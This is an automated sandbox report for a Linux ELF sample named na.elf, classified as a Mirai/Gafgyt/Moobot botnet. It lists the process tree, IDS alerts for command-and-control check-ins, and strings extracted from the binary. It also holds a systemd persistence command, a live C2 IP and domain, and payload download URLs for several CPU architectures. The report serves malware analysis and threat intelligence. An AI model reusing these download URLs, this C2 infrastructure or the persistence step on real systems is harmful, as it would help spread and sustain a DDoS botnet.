Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1528132
MD5:47b283fe2b62434075319b4e9ca076de
SHA1:0b8a05062078824a5c64972d6281d350b5b7ad10
SHA256:a364e8acff9c109c29a70ea35f6b27cb08ef74cd45fd8418c6e459edbe258b1c
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Gafgyt, Moobot, Okiru
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Detected Mirai
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Moobot
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528132
Start date and time:2024-10-07 16:25:55 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 18s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal92.troj.linELF@0/3@34/0
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:5691
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
bolu_botnet_done.
Standard Error:
  • system is lnxubuntu20
  • na.elf (PID: 5691, Parent: 5617, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 5693, Parent: 5691)
    • na.elf New Fork (PID: 5695, Parent: 5691)
    • sh (PID: 5695, Parent: 5691, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
      • sh New Fork (PID: 5701, Parent: 5695)
      • systemctl (PID: 5701, Parent: 5695, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service
    • na.elf New Fork (PID: 5705, Parent: 5691)
  • systemd New Fork (PID: 5703, Parent: 5702)
  • snapd-env-generator (PID: 5703, Parent: 5702, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    na.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      na.elfJoeSecurity_MoobotYara detected MoobotJoe Security
        SourceRuleDescriptionAuthorStrings
        5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
          5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
            5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
              Process Memory Space: na.elf PID: 5691JoeSecurity_OkiruYara detected OkiruJoe Security
                Process Memory Space: na.elf PID: 5691JoeSecurity_MoobotYara detected MoobotJoe Security
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-07T16:26:59.723365+020020304901Malware Command and Control Activity Detected192.168.2.154161691.200.103.11723561TCP
                  2024-10-07T16:27:04.345846+020020304901Malware Command and Control Activity Detected192.168.2.154161891.200.103.11723561TCP
                  2024-10-07T16:27:09.026283+020020304901Malware Command and Control Activity Detected192.168.2.154162091.200.103.11723561TCP
                  2024-10-07T16:27:20.647292+020020304901Malware Command and Control Activity Detected192.168.2.154162291.200.103.11723561TCP
                  2024-10-07T16:27:24.335242+020020304901Malware Command and Control Activity Detected192.168.2.154162491.200.103.11723561TCP
                  2024-10-07T16:27:33.965618+020020304901Malware Command and Control Activity Detected192.168.2.154162691.200.103.11723561TCP
                  2024-10-07T16:27:37.604755+020020304901Malware Command and Control Activity Detected192.168.2.154162891.200.103.11723561TCP
                  2024-10-07T16:27:46.506480+020020304901Malware Command and Control Activity Detected192.168.2.154163091.200.103.11723561TCP
                  2024-10-07T16:27:54.144610+020020304901Malware Command and Control Activity Detected192.168.2.154163291.200.103.11723561TCP
                  2024-10-07T16:27:56.766969+020020304901Malware Command and Control Activity Detected192.168.2.154163491.200.103.11723561TCP
                  2024-10-07T16:28:04.387884+020020304901Malware Command and Control Activity Detected192.168.2.154163691.200.103.11723561TCP
                  2024-10-07T16:28:07.029462+020020304901Malware Command and Control Activity Detected192.168.2.154163891.200.103.11723561TCP
                  2024-10-07T16:28:10.818956+020020304901Malware Command and Control Activity Detected192.168.2.154164091.200.103.11723561TCP
                  2024-10-07T16:28:13.488128+020020304901Malware Command and Control Activity Detected192.168.2.154164291.200.103.11723561TCP
                  2024-10-07T16:28:24.114230+020020304901Malware Command and Control Activity Detected192.168.2.154164491.200.103.11723561TCP
                  2024-10-07T16:28:34.803958+020020304901Malware Command and Control Activity Detected192.168.2.154164691.200.103.11723561TCP
                  2024-10-07T16:28:43.824060+020020304901Malware Command and Control Activity Detected192.168.2.154164891.200.103.11723561TCP
                  2024-10-07T16:28:51.844240+020020304901Malware Command and Control Activity Detected192.168.2.154165091.200.103.11723561TCP
                  2024-10-07T16:28:57.507766+020020304901Malware Command and Control Activity Detected192.168.2.154165291.200.103.11723561TCP
                  2024-10-07T16:29:00.124032+020020304901Malware Command and Control Activity Detected192.168.2.154165491.200.103.11723561TCP
                  2024-10-07T16:29:03.818952+020020304901Malware Command and Control Activity Detected192.168.2.154165691.200.103.11723561TCP
                  2024-10-07T16:29:09.456097+020020304901Malware Command and Control Activity Detected192.168.2.154165891.200.103.11723561TCP
                  2024-10-07T16:29:21.265138+020020304901Malware Command and Control Activity Detected192.168.2.154166091.200.103.11723561TCP
                  2024-10-07T16:29:28.886641+020020304901Malware Command and Control Activity Detected192.168.2.154166291.200.103.11723561TCP
                  2024-10-07T16:29:40.562967+020020304901Malware Command and Control Activity Detected192.168.2.154166491.200.103.11723561TCP
                  2024-10-07T16:29:45.542576+020020304901Malware Command and Control Activity Detected192.168.2.154166891.200.103.11723561TCP
                  2024-10-07T16:29:52.101309+020020304901Malware Command and Control Activity Detected192.168.2.154167091.200.103.11723561TCP
                  2024-10-07T16:29:56.715479+020020304901Malware Command and Control Activity Detected192.168.2.154167291.200.103.11723561TCP
                  2024-10-07T16:30:08.358601+020020304901Malware Command and Control Activity Detected192.168.2.154167491.200.103.11723561TCP
                  2024-10-07T16:30:12.001095+020020304901Malware Command and Control Activity Detected192.168.2.154167691.200.103.11723561TCP
                  2024-10-07T16:30:21.695401+020020304901Malware Command and Control Activity Detected192.168.2.154167891.200.103.11723561TCP
                  2024-10-07T16:30:28.314262+020020304901Malware Command and Control Activity Detected192.168.2.154168091.200.103.11723561TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: na.elfReversingLabs: Detection: 55%
                  Source: na.elfString: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41620 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41630 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41660 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41632 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41618 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41642 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41646 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41634 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41638 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41652 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41674 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41654 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41616 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41640 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41678 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41622 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41628 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41650 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41664 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41656 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41676 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41644 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41662 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41680 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41670 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41658 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41636 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41672 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41624 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41626 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41668 -> 91.200.103.117:23561
                  Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.15:41648 -> 91.200.103.117:23561
                  Source: global trafficTCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561
                  Source: global trafficTCP traffic: 192.168.2.15:41616 -> 91.200.103.117:23561
                  Source: global trafficDNS traffic detected: DNS query: yi0key.heleh.com.vn
                  Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                  Source: na.elfString found in binary or memory: http://91.200.103.117/%s
                  Source: na.elf, 5691.1.00007fedd8042000.00007fedd804d000.rw-.sdmp, sbolo.service.12.drString found in binary or memory: http://91.200.103.117/bolubotnetarm
                  Source: Initial sampleString containing 'busybox' found: busybox
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinernetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: classification engineClassification label: mal92.troj.linELF@0/3@34/0
                  Source: /tmp/na.elf (PID: 5695)Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"Jump to behavior
                  Source: /bin/sh (PID: 5701)Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.serviceJump to behavior
                  Source: /tmp/na.elf (PID: 5691)Queries kernel information via 'uname': Jump to behavior
                  Source: na.elf, 5691.1.00005612a8ed3000.00005612a9001000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                  Source: na.elf, 5691.1.00007ffd161d3000.00007ffd161f4000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
                  Source: na.elf, 5691.1.00005612a8ed3000.00005612a9001000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/arm
                  Source: na.elf, 5691.1.00007ffd161d3000.00007ffd161f4000.rw-.sdmpBinary or memory string: Mx86_64/usr/bin/qemu-arm/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR
                  Source: Yara matchFile source: na.elf, type: SAMPLE
                  Source: Yara matchFile source: 5691.1.00007fedd8017000.00007fedd8035000.r-x.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: na.elf PID: 5691, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information2
                  Scripting
                  Valid AccountsWindows Management Instrumentation1
                  Systemd Service
                  1
                  Systemd Service
                  Direct Volume AccessOS Credential Dumping11
                  Security Software Discovery
                  Remote ServicesData from Local System1
                  Non-Standard Port
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Scripting
                  Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  No configs have been found
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Number of created Files
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528132 Sample: na.elf Startdate: 07/10/2024 Architecture: LINUX Score: 92 20 yi0key.heleh.com.vn 91.200.103.117, 23561, 41616, 41618 COMBAHTONcombahtonGmbHDE Germany 2->20 22 daisy.ubuntu.com 2->22 24 Suricata IDS alerts for network traffic 2->24 26 Detected Mirai 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 4 other signatures 2->30 8 na.elf 2->8         started        10 systemd snapd-env-generator 2->10         started        signatures3 process4 process5 12 na.elf sh 8->12         started        14 na.elf 8->14         started        16 na.elf 8->16         started        process6 18 sh systemctl 12->18         started       
                  SourceDetectionScannerLabelLink
                  na.elf55%ReversingLabsLinux.Backdoor.Mirai
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  daisy.ubuntu.com
                  162.213.35.25
                  truefalse
                    unknown
                    yi0key.heleh.com.vn
                    91.200.103.117
                    truetrue
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://91.200.103.117/%sna.elffalse
                        unknown
                        http://91.200.103.117/bolubotnetarmna.elf, 5691.1.00007fedd8042000.00007fedd804d000.rw-.sdmp, sbolo.service.12.drfalse
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          91.200.103.117
                          yi0key.heleh.com.vnGermany
                          30823COMBAHTONcombahtonGmbHDEtrue
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          91.200.103.117na.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                            na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                    na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      daisy.ubuntu.comna.elfGet hashmaliciousUnknownBrowse
                                      • 162.213.35.25
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 162.213.35.25
                                      na.elfGet hashmaliciousUnknownBrowse
                                      • 162.213.35.25
                                      na.elfGet hashmaliciousGafgytBrowse
                                      • 162.213.35.25
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 162.213.35.24
                                      na.elfGet hashmaliciousGafgytBrowse
                                      • 162.213.35.25
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 162.213.35.25
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 162.213.35.24
                                      na.elfGet hashmaliciousUnknownBrowse
                                      • 162.213.35.25
                                      na.elfGet hashmaliciousUnknownBrowse
                                      • 162.213.35.25
                                      yi0key.heleh.com.vnna.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                      • 91.200.103.117
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      COMBAHTONcombahtonGmbHDEna.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                      • 91.200.103.117
